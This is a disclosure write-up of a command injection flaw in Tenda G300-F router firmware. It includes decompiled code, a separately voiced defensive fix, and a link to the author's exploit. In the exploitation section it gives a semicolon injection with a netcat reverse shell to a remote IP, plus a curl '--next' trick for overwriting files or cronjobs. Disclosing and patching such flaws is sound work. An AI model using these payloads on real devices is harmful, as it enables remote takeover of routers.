CVE-2026-25857

Summary: Tenda G300-F router firmware versions 16.01.14.2 and prior contain an OS command injection vulnerability in the WAN diagnostic functionality (formSetWanDiag). The implementation constructs a shell command that invokes curl and incorporates attacker-controlled input into the command line without adequate neutralization. As a result, a remote attacker with access to the affected management interface can inject additional shell syntax and execute arbitrary commands on the device with the privileges of the management process.

pending CVE-2026-25857

Tenda G300-F OSCI/parameter injection disclosure

The core vulnerability lies in the following code (decompiler output):

__int64 __fastcall cmd_get_http_code(const char *a1, const char *userbuffer, int a3)
{
  int v4; // s1
  int *v5; // a0
  char *v6; // a0
  __int64 v11; // [sp+20h] [-130h] BYREF
  char v12; // [sp+28h] [-128h] OVERLAPPED BYREF
  char v13; // [sp+30h] [-120h] BYREF
  FILE *v14; // [sp+128h] [-28h]

  v14 = 0LL;
  *(_QWORD *)&v12 = 0LL;
  memset(&v13, 0, 0xF8uLL);
  v11 = 0LL;
  if ( !a1 || !userbuffer )
    return 0LL;
  snprintf(
    &v12,
    256uLL,
    "curl --interface %s --max-time %d -w \"%%{http_code}\" -o /dev/null -skIL %s",
    a1,
    a3,
    userbuffer);
  v14 = popen(&v12, "r");

The code is a bit screwed, so I manually reversed it so that it is readable enough:

#include <stdio.h>
#include <string.h>

int cmd_get_http_code(const char *interface, const char *url, int timeout)
{
    int err;
    int *errno_ptr;
    char *error_str;
    long http_code;
    char command_buffer[256];
    char output_buffer[8];
    FILE *pipe;

    pipe = 0;
    *(long long *)command_buffer = 0;
    memset(command_buffer + 8, 0, 248); // 8 bytes after old v12
    http_code = 0;
    if (!interface || !url)
        return 0;
    // interface and url come straight from the request and are pasted into a shell command line
    snprintf(
        command_buffer,
        256,
        "curl --interface %s --max-time %d -w \"%%{http_code}\" -o /dev/null -skIL %s",
        interface,
        timeout,
        url);
    pipe = popen(command_buffer, "r"); // popen() hands the string to /bin/sh -c
    if (pipe)
    {
        // ... rest is not important
    }
    return http_code; // assumed: v11 in the decompiled output is the returned value
}

The core bug is really obvious from the popen(), so I'll leave it at that. To exploit, simply ensure a semicolon prepends your command: ; ls -aril or ; nc 192.168.1.67 1234 -e sh. Trigger via formSetWanDiag, which I suspect is the endpoint /goform/setWanDiag. I'll release an xp soon.

Evading their potential ‘patch’

Judging by Tenda’s prior patches on vulnerabilities, they’ll likely replace it with posix_spawn or a wrapper that does something equivalent. This doesn’t neutralize the problem because we can still chain file writes with curl’s --next: --next {url} -o {outpath}, meaning we can overwrite files/cronjobs/etc.
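For contrast, here is what an actual fix for cmd_get_http_code looks like. This is an added example written for this page, not Tenda's firmware code and not the author's exploit; the function names (is_safe_ifname, is_safe_url, build_curl_argv, cmd_get_http_code_safe) are hypothetical. It addresses both the popen() command injection and the --next argument injection described above: the two user-controlled strings are allow-list validated, curl is started through posix_spawnp with an argv array so no shell ever parses the input, and the "--" end-of-options marker sits before the URL so curl cannot treat it as a flag even if validation were later loosened. Swapping popen() for posix_spawn without those two controls, which is the patch shape the author expects, would leave the --next path open.

```c
#include <ctype.h>
#include <spawn.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

extern char **environ;

/* Interface names: 1..15 chars of [A-Za-z0-9._-], not starting with '-'
 * (a leading '-' would otherwise be parsed by curl as an option). */
int is_safe_ifname(const char *name)
{
    size_t len, i;
    if (!name) return 0;
    len = strlen(name);
    if (len == 0 || len > 15 || name[0] == '-') return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '.' && c != '_' && c != '-') return 0;
    }
    return 1;
}

/* URLs: http:// or https://, at most 200 chars, alnum plus a small set of URL
 * punctuation. Whitespace, ';', quotes, '|', '`', '$', braces and brackets are
 * all rejected, so neither shell metacharacters nor curl globbing get through. */
int is_safe_url(const char *url)
{
    static const char extra[] = "-._~:/?=&%+";
    size_t len, i;
    if (!url) return 0;
    len = strlen(url);
    if (len < 8 || len > 200) return 0;
    if (strncmp(url, "http://", 7) != 0 && strncmp(url, "https://", 8) != 0) return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)url[i];
        if (!isalnum(c) && !strchr(extra, (int)c)) return 0;
    }
    return 1;
}

/* Build the same curl invocation the firmware uses, as separate arguments.
 * Returns the argument count, or -1 if any input is rejected.
 * timeout_buf must outlive argv: it backs the --max-time value. */
int build_curl_argv(const char *ifname, const char *url, int timeout,
                    char *argv[], size_t argv_cap, char *timeout_buf, size_t tb_len)
{
    size_t n = 0;
    if (!is_safe_ifname(ifname) || !is_safe_url(url)) return -1;
    if (timeout < 1 || timeout > 60) return -1;  /* sane bound for a diagnostic */
    if (argv_cap < 13 || tb_len < 4) return -1;  /* 12 arguments + NULL */
    snprintf(timeout_buf, tb_len, "%d", timeout);
    argv[n++] = "curl";
    argv[n++] = "--interface"; argv[n++] = (char *)ifname;
    argv[n++] = "--max-time";  argv[n++] = timeout_buf;
    argv[n++] = "-w";          argv[n++] = "%{http_code}";
    argv[n++] = "-o";          argv[n++] = "/dev/null";
    argv[n++] = "-skIL";
    argv[n++] = "--";          /* end of options: the URL can never become a flag */
    argv[n++] = (char *)url;
    argv[n] = NULL;
    return (int)n;
}

/* Run curl via posix_spawnp with an argv array: /bin/sh is never involved, so
 * no byte of user input is interpreted as shell syntax. Returns the HTTP
 * status code, or 0 if the input was refused or curl could not be started. */
long cmd_get_http_code_safe(const char *ifname, const char *url, int timeout)
{
    char *argv[16], timeout_buf[16], out[16] = {0};
    int fds[2], rc;
    pid_t pid;
    long code = 0;
    posix_spawn_file_actions_t fa;

    if (build_curl_argv(ifname, url, timeout, argv, 16, timeout_buf, sizeof timeout_buf) < 0)
        return 0;
    if (pipe(fds) != 0) return 0;
    posix_spawn_file_actions_init(&fa);
    posix_spawn_file_actions_adddup2(&fa, fds[1], STDOUT_FILENO);
    posix_spawn_file_actions_addclose(&fa, fds[0]);
    posix_spawn_file_actions_addclose(&fa, fds[1]);
    rc = posix_spawnp(&pid, "curl", &fa, NULL, argv, environ);
    posix_spawn_file_actions_destroy(&fa);
    close(fds[1]);
    if (rc == 0) {
        if (read(fds[0], out, sizeof out - 1) > 0) code = strtol(out, NULL, 10);
        waitpid(pid, NULL, 0);
    }
    close(fds[0]);
    return code;
}

int main(void)
{
    /* Constructed inputs: one benign target and the two injection shapes from this page. */
    const char *in[] = { "http://192.168.1.1/", "http://x; ls -aril", "--next http://x -o /tmp/y" };
    size_t i;
    for (i = 0; i < 3; i++)
        printf("%-28s -> %s\n", in[i], is_safe_url(in[i]) ? "accepted" : "rejected");
    return 0;
}
```

Validation and "--" are deliberately independent: the allow-list stops the payloads seen here at the front door, and the end-of-options marker means a future relaxation of the allow-list (say, to permit '[' for IPv6 literals) still cannot reintroduce option injection. Checking for the shape of the fix rather than just the absence of popen() is the test a reviewer should apply to any vendor patch for this CVE.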

Exploit

You can get the xp here: https://github.com/eeeeeeeeeevan/CVE-2026-25857

If it is still private, that means the CVE advisory hasn't been published yet.